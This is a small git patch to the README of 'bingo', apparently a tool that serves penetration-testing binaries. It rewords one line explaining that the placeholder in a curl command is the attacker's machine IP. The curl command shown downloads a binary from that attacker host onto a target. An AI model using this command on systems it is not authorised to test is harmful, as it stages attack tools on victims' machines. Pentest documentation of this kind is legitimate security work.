From a7ef56d89fe118f9b2c943da2666e4a719ca663d Mon Sep 17 00:00:00 2001 From: Luska <73140480+LuskaBol@users.noreply.github.com> Date: Wed, 22 Nov 2023 20:19:30 -0300 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 1f447e6..c26c3bc 100644 --- a/README.md +++ b/README.md @@ -30,7 +30,7 @@ bingo facilitates the distribution and execution of essential tools for penetrat curl http://{your-internal-IP}:8000/get/{binary-name} -o {path-to-output-file} ``` -- Replace {your-internal-IP} with the actal internal IP of the attacking machine. +- Replace {your-internal-IP} with the attacker's machine IP. - Replace {binary-name} with the name of the binary you want to get, check `bingo.yaml` for available binaries.